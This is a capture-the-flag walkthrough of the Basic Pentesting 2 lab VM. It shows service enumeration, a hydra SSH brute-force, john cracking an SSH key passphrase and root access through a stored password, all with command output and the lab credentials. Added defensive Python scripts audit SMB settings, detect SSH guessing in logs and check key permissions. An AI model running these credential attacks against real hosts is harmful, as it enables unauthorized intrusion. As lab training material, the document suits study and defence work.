Basic Pentesting 2 Walkthrough

Mr. Robot
Published in InfoSec Adventures
9 min read · Nov 14, 2018

This is a boot2root VM and is a continuation of the Basic Pentesting series. This series is designed to help newcomers to penetration testing develop pentesting skills and have fun exploring part of the offensive side of security.

VirtualBox is the recommended platform for this challenge (though it should also work with VMware — however, I haven’t tested that).

This VM is a moderate step up in difficulty from the first entry in this series. If you’ve solved the first entry and have tried a few other beginner-oriented challenges, this VM should be a good next step. Once again, this challenge contains multiple initial exploitation vectors and privilege escalation vulnerabilities.

Your goal is to remotely attack the VM, gain root privileges, and read the flag located at /root/flag.txt. Once you’ve finished, try to find other vectors you might have missed!

The result of the initial port scan with nmap:

root@kali:~# nmap -A -p 1-65535 192.168.43.170
Nmap scan report for basic2 (192.168.43.170)
Host is up (0.00021s latency).
Not shown: 65529 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 db:45:cb:be:4a:8b:71:f8:e9:31:42:ae:ff:f8:45:e4 (RSA)
| 256 09:b9:b9:1c:e0:bf:0e:1c:6f:7f:fe:8e:5f:20:1b:ce (ECDSA)
|_ 256 a5:68:2b:22:5f:98:4a:62:21:3d:a2:e2:c5:a9:f7:c2 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
| ajp-methods:
|_ Supported methods: GET HEAD POST OPTIONS
8080/tcp open http Apache Tomcat 9.0.7
|_http-favicon: Apache Tomcat
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: Apache Tomcat/9.0.7
MAC Address: 08:00:27:A1:01:12 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: 1h19m59s, deviation: 2h18m33s, median: 0s
|_nbstat: NetBIOS name: BASIC2, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
| Computer name: basic2
| NetBIOS computer name: BASIC2\x00
| Domain name: \x00
| FQDN: basic2
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
|_ start_date: N/A
TRACEROUTE
HOP RTT ADDRESS
1 0.21 ms basic2 (192.168.43.170)

Well, there are some interesting open ports. I think the Samba service is particularly interesting, and enum4linux is an excellent tool to do the enumeration for us:

root@kali:~# enum4linux 192.168.43.170
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ )
==========================
| Target Information |
==========================
Target ........... 192.168.43.170
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
======================================================
| Enumerating Workgroup/Domain on 192.168.43.170 |
======================================================
[+] Got domain/workgroup name: WORKGROUP
==============================================
| Nbtstat Information for 192.168.43.170 |
==============================================
Looking up status of 192.168.43.170
BASIC2 <00> - B <ACTIVE> Workstation Service
BASIC2 <03> - B <ACTIVE> Messenger Service
BASIC2 <20> - B <ACTIVE> File Server Service
..__MSBROWSE__. <01> - <GROUP> B <ACTIVE> Master Browser
WORKGROUP <00> - <GROUP> B <ACTIVE> Domain/Workgroup Name
WORKGROUP <1d> - B <ACTIVE> Master Browser
WORKGROUP <1e> - <GROUP> B <ACTIVE> Browser Service Elections
MAC Address = 00-00-00-00-00-00
=======================================
| Session Check on 192.168.43.170 |
=======================================
[+] Server 192.168.43.170 allows sessions using username '', password ''
=============================================
| Getting domain SID for 192.168.43.170 |
=============================================
Domain Name: WORKGROUP
Domain Sid: (NULL SID)
[+] Can't determine if host is part of domain or part of a workgroup
========================================
| OS information on 192.168.43.170 |
========================================
Use of uninitialized value $os_info in concatenation (.) or string at ./enum4linux.pl line 464.
[+] Got OS info for 192.168.43.170 from smbclient:
[+] Got OS info for 192.168.43.170 from srvinfo:
BASIC2 Wk Sv PrQ Unx NT SNT Samba Server 4.3.11-Ubuntu
platform_id : 500
os version : 6.1
server type : 0x809a03
===============================
| Users on 192.168.43.170 |
===============================
Use of uninitialized value $users in print at ./enum4linux.pl line 874.
Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 877.
Use of uninitialized value $users in print at ./enum4linux.pl line 888.
Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 890.
===========================================
| Share Enumeration on 192.168.43.170 |
===========================================
WARNING: The "syslog" option is deprecated
Sharename Type Comment
--------- ---- -------
Anonymous Disk
IPC$ IPC IPC Service (Samba Server 4.3.11-Ubuntu)
Reconnecting with SMB1 for workgroup listing.
Server Comment
--------- -------
Workgroup Master
--------- -------
WORKGROUP BASIC2
[+] Attempting to map shares on 192.168.43.170
//192.168.43.170/Anonymous Mapping: OK, Listing: OK
//192.168.43.170/IPC$ [E] Can't understand response:
WARNING: The "syslog" option is deprecated
NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*
======================================================
| Password Policy Information for 192.168.43.170 |
======================================================
[+] Attaching to 192.168.43.170 using a NULL share
[+] Trying protocol 445/SMB...
[+] Found domain(s):
[+] BASIC2
[+] Builtin
[+] Password Info for Domain: BASIC2
[+] Minimum password length: 5
[+] Password history length: None
[+] Maximum password age: 37 days 6 hours 21 minutes
[+] Password Complexity Flags: 000000
[+] Domain Refuse Password Change: 0
[+] Domain Password Store Cleartext: 0
[+] Domain Password Lockout Admins: 0
[+] Domain Password No Clear Change: 0
[+] Domain Password No Anon Change: 0
[+] Domain Password Complex: 0
[+] Minimum password age: None
[+] Reset Account Lockout Counter: 30 minutes
[+] Locked Account Duration: 30 minutes
[+] Account Lockout Threshold: None
[+] Forced Log off Time: 37 days 6 hours 21 minutes
[+] Retieved partial password policy with rpcclient:
Password Complexity: Disabled
Minimum Password Length: 5
================================
| Groups on 192.168.43.170 |
================================
[+] Getting builtin groups:
[+] Getting builtin group memberships:
[+] Getting local groups:
[+] Getting local group memberships:
[+] Getting domain groups:
[+] Getting domain group memberships:
====================================================================
| Users on 192.168.43.170 via RID cycling |
===================================================================
[I] Found new SID: S-1-22-1
[I] Found new SID: S-1-5-21-2853212168-2008227510-3551253869
[I] Found new SID: S-1-5-32
[+] Enumerating users using SID S-1-5-32 and logon username '', password ''
--- snip ---
S-1-5-32-544 BUILTIN\Administrators (Local Group)
S-1-5-32-545 BUILTIN\Users (Local Group)
S-1-5-32-546 BUILTIN\Guests (Local Group)
S-1-5-32-547 BUILTIN\Power Users (Local Group)
S-1-5-32-548 BUILTIN\Account Operators (Local Group)
S-1-5-32-549 BUILTIN\Server Operators (Local Group)
S-1-5-32-550 BUILTIN\Print Operators (Local Group)
--- snip ---
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\kay (Local User)
S-1-22-1-1001 Unix User\jan (Local User)
[+] Enumerating users using SID S-1-5-21-2853212168-2008227510-3551253869 and logon username '', password ''
S-1-5-21-2853212168-2008227510-3551253869-501 BASIC2\nobody (Local User)
S-1-5-21-2853212168-2008227510-3551253869-513 BASIC2\None (Domain Group)
--- snip ---
===============================================
| Getting printer info for 192.168.43.170 |
===============================================
No printers returned.
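
The enum4linux run above surfaces the settings a defender should care about: a null session is accepted, the Anonymous share is listable without credentials, the minimum password length is 5 with complexity disabled, and there is no lockout threshold. The following script, an added example that is not part of the walkthrough, parses a constructed excerpt of that output and reports each finding against an assumed baseline (the baseline numbers are my assumption, not anything the VM defines). Pointing it at a saved enum4linux log turns the manual read-through into a repeatable check.

```python
"""Flag weak SMB settings from enum4linux output.

Added example (not part of the walkthrough). SAMPLE_OUTPUT is a constructed
excerpt modelled on the enum4linux run shown above; BASELINE is an assumed
hardening policy, not something the VM or the tool defines.
"""
import re

# Constructed excerpt of enum4linux output (abbreviated from the scan above).
SAMPLE_OUTPUT = """\
[+] Server 192.168.43.170 allows sessions using username '', password ''
//192.168.43.170/Anonymous Mapping: OK, Listing: OK
//192.168.43.170/IPC$ [E] Can't understand response:
[+] Password Info for Domain: BASIC2
[+] Minimum password length: 5
[+] Password Complexity Flags: 000000
[+] Account Lockout Threshold: None
Password Complexity: Disabled
Minimum Password Length: 5
S-1-22-1-1000 Unix User\\kay (Local User)
S-1-22-1-1001 Unix User\\jan (Local User)
"""

# Assumed baseline the findings are judged against.
BASELINE = {"min_password_length": 12, "lockout_threshold_max": 10}


def parse_enum4linux(text):
    """Extract the settings this checker cares about into a plain dict."""
    info = {
        "null_session": False,
        "anonymous_shares": [],
        "local_users": [],
        "min_password_length": None,
        "complexity_enabled": None,
        "lockout_threshold": None,  # 0 means "no lockout configured"
    }
    for line in text.splitlines():
        if "allows sessions using username '', password ''" in line:
            info["null_session"] = True
            continue
        m = re.match(r"//\S+/(\S+)\s+Mapping: OK, Listing: OK", line)
        if m:
            info["anonymous_shares"].append(m.group(1))
            continue
        m = re.search(r"Unix User\\(\w+) \(Local User\)", line)
        if m:
            info["local_users"].append(m.group(1))
            continue
        # enum4linux prints the length twice with different capitalisation.
        m = re.search(r"Minimum password length:\s*(\d+)", line, re.I)
        if m:
            info["min_password_length"] = int(m.group(1))
            continue
        m = re.search(r"Password Complexity:\s*(\w+)", line)
        if m:
            info["complexity_enabled"] = m.group(1).lower() != "disabled"
            continue
        m = re.search(r"Account Lockout Threshold:\s*(\S+)", line)
        if m:
            value = m.group(1)
            info["lockout_threshold"] = 0 if value == "None" else int(value)
    return info


def assess(info, baseline=BASELINE):
    """Turn the parsed settings into a list of human-readable issues."""
    issues = []
    if info["null_session"]:
        issues.append("null session allowed: unauthenticated users can enumerate "
                      "users, shares and the password policy")
    for share in info["anonymous_shares"]:
        issues.append(f"share '{share}' can be mapped and listed without credentials")
    length = info["min_password_length"]
    if length is not None and length < baseline["min_password_length"]:
        issues.append(f"minimum password length {length} is below the baseline "
                      f"of {baseline['min_password_length']}")
    if info["complexity_enabled"] is False:
        issues.append("password complexity is disabled")
    if info["lockout_threshold"] == 0:
        issues.append("no account lockout threshold: online guessing is unthrottled")
    elif (info["lockout_threshold"] is not None
          and info["lockout_threshold"] > baseline["lockout_threshold_max"]):
        issues.append(f"lockout threshold {info['lockout_threshold']} is above the "
                      f"baseline of {baseline['lockout_threshold_max']}")
    return issues


if __name__ == "__main__":
    parsed = parse_enum4linux(SAMPLE_OUTPUT)
    print(f"local users visible anonymously: {', '.join(parsed['local_users'])}")
    for issue in assess(parsed):
        print(f"[!] {issue}")
```

Every one of the five issues the sample produces is something the VM's administrator could have changed in smb.conf or the Samba password policy; the user list it recovers (kay and jan) is exactly what made the later password guessing targeted rather than blind.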

As you can see, I was able to identify two users on the system, kay and jan. Next, I ran nikto against the web server:

root@kali:~# nikto -h 192.168.43.170
- Nikto v2.1.6
--------------------------------------------------------------------
+ Target IP: 192.168.43.170
+ Target Hostname: 192.168.43.170
+ Target Port: 80
--------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ Server leaks inodes via ETags, header found with file /, fields: 0x9e 0x56a870fbc8f28
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Allowed HTTP Methods: OPTIONS, GET, HEAD, POST
+ OSVDB-3268: /development/: Directory indexing found.
+ OSVDB-3092: /development/: This might be interesting...
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7535 requests: 0 error(s) and 8 item(s) reported on remote host
--------------------------------------------------------------------
+ 1 host(s) tested

There was an interesting directory called development, which contained two txt files:

2018-04-23: I've been messing with that struts stuff, and it's pretty cool!
I think it might be neat to host that on this server too. Haven't made any real web
apps yet, but I have tried that example you get to show off how it works (and it's
the REST version of the example!). Oh, and right now I'm using version 2.5.12,
because other versions were giving me trouble. -K

2018-04-22: SMB has been configured. -K

2018-04-21: I got Apache set up. Will put in our content later. -J

For J:

I've been auditing the contents of /etc/shadow to make sure we don't have any weak
credentials, and I was able to crack your hash really easily. You know our password
policy, so please follow it? Change that password ASAP.
-K

Now I knew that jan had a weak password and SSH was running, so I tried to brute-force it with hydra:

root@kali:~# hydra -l jan -P /usr/share/wordlists/rockyou.txt ssh://192.168.43.170
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (http://www.thc.org/thc-hydra)
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://192.168.43.170:22/
[STATUS] 263.00 tries/min, 263 tries in 00:01h, 14344143 to do in 909:01h, 16 active
[STATUS] 247.67 tries/min, 743 tries in 00:03h, 14343663 to do in 965:16h, 16 active
[22][ssh] host: 192.168.43.170 login: jan password: armando
1 of 1 target successfully completed, 1 valid password found
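
From the target's side, the hydra run above is anything but quiet: sixteen parallel sessions at roughly 250 tries a minute leave a dense run of "Failed password" lines in sshd's auth log, followed by an "Accepted password" from the same source once "armando" is hit. The detector below is an added example, not part of the walkthrough; it works over constructed auth.log lines modelled on that pattern and raises two kinds of alert: a source that exceeds a failure threshold inside a time window, and a successful login from a source that was just guessing.

```python
"""Detect SSH password guessing in sshd auth-log lines.

Added example, not from the walkthrough. SAMPLE_LOG is constructed to look
like what the hydra run above would leave in /var/log/auth.log on the target;
the host name, PIDs and source addresses are made up.
"""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

SAMPLE_LOG = """\
Nov 14 10:01:02 basic2 sshd[1201]: Failed password for jan from 192.168.43.1 port 51000 ssh2
Nov 14 10:01:03 basic2 sshd[1203]: Failed password for invalid user admin from 192.168.43.1 port 51001 ssh2
Nov 14 10:01:04 basic2 sshd[1205]: Failed password for jan from 192.168.43.1 port 51002 ssh2
Nov 14 10:01:05 basic2 sshd[1207]: Failed password for kay from 192.168.43.1 port 51003 ssh2
Nov 14 10:01:06 basic2 sshd[1209]: Failed password for jan from 192.168.43.1 port 51004 ssh2
Nov 14 10:01:07 basic2 sshd[1211]: Failed password for jan from 192.168.43.1 port 51005 ssh2
Nov 14 10:01:09 basic2 sshd[1213]: Accepted password for jan from 192.168.43.1 port 51006 ssh2
Nov 14 10:02:00 basic2 sshd[1300]: Failed password for kay from 192.168.43.20 port 40000 ssh2
Nov 14 10:02:05 basic2 sshd[1302]: Accepted publickey for kay from 192.168.43.20 port 40001 ssh2
Nov 14 10:02:06 basic2 sshd[1302]: pam_unix(sshd:session): session opened for user kay by (uid=0)
"""

# Matches the "Failed/Accepted <method> for [invalid user] <user> from <ip> port <n>" lines.
LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?P<method>\w+) for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\S+) port \d+"
)


def parse_line(line):
    """Return a dict for an authentication event, or None for any other line."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ev = m.groupdict()
    # Syslog timestamps carry no year; only the ordering matters for windowing.
    ev["ts"] = datetime.strptime(ev["ts"], "%b %d %H:%M:%S")
    return ev


def detect_bruteforce(lines, threshold=5, window=timedelta(minutes=5)):
    """Alert on sources with >= threshold failures per window, and on a
    successful login from a source that was guessing just before."""
    alerts = []
    failures = defaultdict(deque)   # source ip -> timestamps of recent failures
    users_tried = defaultdict(set)  # source ip -> usernames attempted
    for line in lines:
        ev = parse_line(line)
        if ev is None:
            continue
        recent = failures[ev["ip"]]
        while recent and ev["ts"] - recent[0] > window:  # slide the window
            recent.popleft()
        if ev["result"] == "Failed":
            recent.append(ev["ts"])
            users_tried[ev["ip"]].add(ev["user"])
            if len(recent) == threshold:  # fire once when the threshold is crossed
                alerts.append({"kind": "bruteforce", "ip": ev["ip"], "at": ev["ts"],
                               "failures": len(recent),
                               "users": sorted(users_tried[ev["ip"]])})
        elif len(recent) >= threshold:
            alerts.append({"kind": "success_after_bruteforce", "ip": ev["ip"],
                           "at": ev["ts"], "user": ev["user"], "method": ev["method"]})
    return alerts


if __name__ == "__main__":
    for alert in detect_bruteforce(SAMPLE_LOG.splitlines()):
        print(alert)
```

The second alert type is the one worth paging on: a burst of failures is noise on any Internet-facing host, but a password accepted right after that burst means the guessing worked. On the mitigation side, sshd's MaxAuthTries setting and a ban tool such as fail2ban would have slowed a run like the one above from minutes to days, and the note in j.txt shows the better fix was simply a password that is not in rockyou.txt.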

Success! I got the password for jan. I logged in via SSH and started exploring the server. After several failed kernel exploit attempts, I decided to explore kay's home directory. I tried logging in as kay, but couldn't guess the password. I discovered that I could access the .ssh directory and all of its contents. SSH login with the private key also failed, because it required a passphrase. I used john to crack the key's passphrase:

root@kali:~/Downloads# ssh2john key.txt > crackme
root@kali:~/Downloads# john crackme
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA 32/64])
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:38 3/3 0g/s 486702p/s 486702c/s 486702C/s tboits
0g 0:00:01:33 3/3 0g/s 517783p/s 517783c/s 517783C/s bhab146
0g 0:00:04:24 3/3 0g/s 532364p/s 532364c/s 532364C/s k11kv3
0g 0:00:07:19 3/3 0g/s 534969p/s 534969c/s 534969C/s ffieb17
0g 0:00:25:41 3/3 0g/s 542544p/s 542544c/s 542544C/s hsfemg
0g 0:00:34:47 3/3 0g/s 543421p/s 543421c/s 543421C/s kj1ja7
0g 0:00:52:24 3/3 0g/s 543436p/s 543436c/s 543436C/s lbi2alu
beeswax (key.txt)
1g 0:00:59:31 DONE 3/3 0.000279g/s 543394p/s 543394c/s 543394C/s beeswax
Use the "--show" option to display all of the cracked passwords reliably
Session completed
root@kali:~/Downloads# john crackme --show
key.txt:beeswax
1 password hash cracked, 0 left
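
Two things went wrong on the target for this step to work: kay's .ssh directory and private key were readable by another local user, and the key's passphrase was weak enough for john's incremental mode to find in under an hour. The audit script below is an added example, not code from the walkthrough; it walks a home directory and reports private keys that other users can read and private keys stored without a passphrase, for both the legacy PEM format (encryption signalled by a Proc-Type header) and the newer OpenSSH format (cipher name in the decoded header). The sample home it builds is constructed, with stand-in keys that have the right headers and no real key material.

```python
"""Audit a home directory for readable or passphrase-less SSH private keys.

Added example, not code from the walkthrough. The keys below are constructed
stand-ins: correct headers, dummy payloads, no usable key material.
"""
import base64
import os
import struct
import tempfile

OPENSSH_MAGIC = b"openssh-key-v1\x00"


def _ssh_string(b):
    """Encode bytes as an SSH wire 'string' (uint32 length prefix + data)."""
    return struct.pack(">I", len(b)) + b


def _openssh_cipher(pem_text):
    """Cipher name from an OpenSSH-format key header ('none' when unencrypted)."""
    body = "".join(l for l in pem_text.splitlines() if not l.startswith("-----"))
    raw = base64.b64decode(body)
    if not raw.startswith(OPENSSH_MAGIC):
        return None
    off = len(OPENSSH_MAGIC)
    (n,) = struct.unpack(">I", raw[off:off + 4])
    return raw[off + 4:off + 4 + n].decode()


def key_is_encrypted(data):
    """True if the private key needs a passphrase, False if stored in the clear."""
    text = data.decode("ascii", "replace")
    if "-----BEGIN OPENSSH PRIVATE KEY-----" in text:
        return _openssh_cipher(text) not in (None, "none")
    if "-----BEGIN ENCRYPTED PRIVATE KEY-----" in text:  # encrypted PKCS#8
        return True
    # Legacy PEM (RSA/DSA/EC): encryption is signalled by a Proc-Type header.
    return "Proc-Type: 4,ENCRYPTED" in text


def audit_home(home):
    """Return (relative path, finding) pairs for the .ssh directory under home."""
    findings = []
    ssh_dir = os.path.join(home, ".ssh")
    if not os.path.isdir(ssh_dir):
        return findings
    if os.stat(ssh_dir).st_mode & 0o077:
        findings.append((".ssh", "directory readable by group/others"))
    for name in sorted(os.listdir(ssh_dir)):
        path = os.path.join(ssh_dir, name)
        if not os.path.isfile(path):
            continue
        with open(path, "rb") as f:
            data = f.read()
        if b"PRIVATE KEY-----" not in data:  # public keys, known_hosts, config
            continue
        rel = os.path.join(".ssh", name)
        if os.stat(path).st_mode & 0o077:
            findings.append((rel, "private key readable by group/others"))
        if not key_is_encrypted(data):
            findings.append((rel, "private key has no passphrase"))
    return findings


# Constructed legacy PEM with the encryption markers and a dummy body.
ENCRYPTED_PEM = (
    "-----BEGIN RSA PRIVATE KEY-----\n"
    "Proc-Type: 4,ENCRYPTED\n"
    "DEK-Info: AES-128-CBC,00000000000000000000000000000000\n\n"
    + base64.b64encode(b"\x00" * 48).decode() + "\n"
    "-----END RSA PRIVATE KEY-----\n"
).encode()


def _openssh_key(cipher, kdf):
    """Constructed OpenSSH-format key: real header layout, dummy payload."""
    raw = (OPENSSH_MAGIC + _ssh_string(cipher) + _ssh_string(kdf)
           + _ssh_string(b"") + struct.pack(">I", 1) + b"\x00" * 32)
    b64 = base64.encodebytes(raw).decode()
    return (f"-----BEGIN OPENSSH PRIVATE KEY-----\n{b64}"
            "-----END OPENSSH PRIVATE KEY-----\n").encode()


PLAINTEXT_OPENSSH = _openssh_key(b"none", b"none")
ENCRYPTED_OPENSSH = _openssh_key(b"aes256-ctr", b"bcrypt")


def build_sample_home(home):
    """Lay out a home directory with the two mistakes seen on the VM."""
    ssh_dir = os.path.join(home, ".ssh")
    os.mkdir(ssh_dir)
    for name, content, mode in (("id_rsa", ENCRYPTED_PEM, 0o644),
                                ("id_ed25519", PLAINTEXT_OPENSSH, 0o600)):
        path = os.path.join(ssh_dir, name)
        with open(path, "wb") as f:
            f.write(content)
        os.chmod(path, mode)
    os.chmod(ssh_dir, 0o755)  # world-readable, like kay's on the target


def run_demo():
    with tempfile.TemporaryDirectory() as home:
        build_sample_home(home)
        return audit_home(home)


if __name__ == "__main__":
    for rel, finding in run_demo():
        print(f"{rel}: {finding}")
```

Run against real accounts (`for h in /home/*; do audit_home(h)` from a small wrapper, or by passing the path in), the same 0o077 mode test would also have flagged pass.bak as readable; the deeper point is that an encrypted key that others can read is only as strong as its passphrase, and "beeswax" fell to john's default incremental mode with no wordlist at all.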

Another user was in the bag; only the root user was missing. But since there was a password in kay's home folder, I thought it might help me get root.

root@kali:~/Downloads# ssh -i key.txt kay@192.168.43.170
Enter passphrase for key 'key.txt':
Welcome to Ubuntu 16.04.4 LTS (GNU/Linux 4.4.0-119-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
128 packages can be updated.
66 updates are security updates.
New release '18.04.1 LTS' available.
Run 'do-release-upgrade' to upgrade to it.
kay@basic2:~$ ls
pass.bak
kay@basic2:~$ cat pass.bak
heresareallystrongpasswordthatfollowsthepasswordpolicy$$
kay@basic2:~$

I was right: kay was able to switch to the root user with this password.

kay@basic2:~$ ls
pass.bak
kay@basic2:~$ cat pass.bak
heresareallystrongpasswordthatfollowsthepasswordpolicy$$
kay@basic2:~$ sudo -s
[sudo] password for kay:
root@basic2:~#

Now I had root, and the flag was:

Congratulations! You’ve completed this challenge. There are two ways (that I’m aware of) to gain a shell, and two ways to privesc. I encourage you to find them all!

If you’re in the target audience (newcomers to pentesting), I hope you learned something. A few takeaways from this challenge should be that every little bit of information you can find can be valuable, but sometimes you’ll need to find several different pieces of information and combine them to make them useful. Enumeration is key! Also, sometimes it’s not as easy as just finding an obviously outdated, vulnerable service right away with a port scan (unlike the first entry in this series). Usually you’ll have to dig deeper to find things that aren’t as obvious, and therefore might’ve been overlooked by administrators.

Thanks for taking the time to solve this VM. If you choose to create a writeup, I hope you’ll send me a link! I can be reached at josiah@vt.edu. If you’ve got questions or feedback, please reach out to me.

Happy hacking!

Mr. Robot
InfoSec Adventures

Self-taught developer with an interest in Offensive Security. I regularly play on Vulnhub and Hack The Box.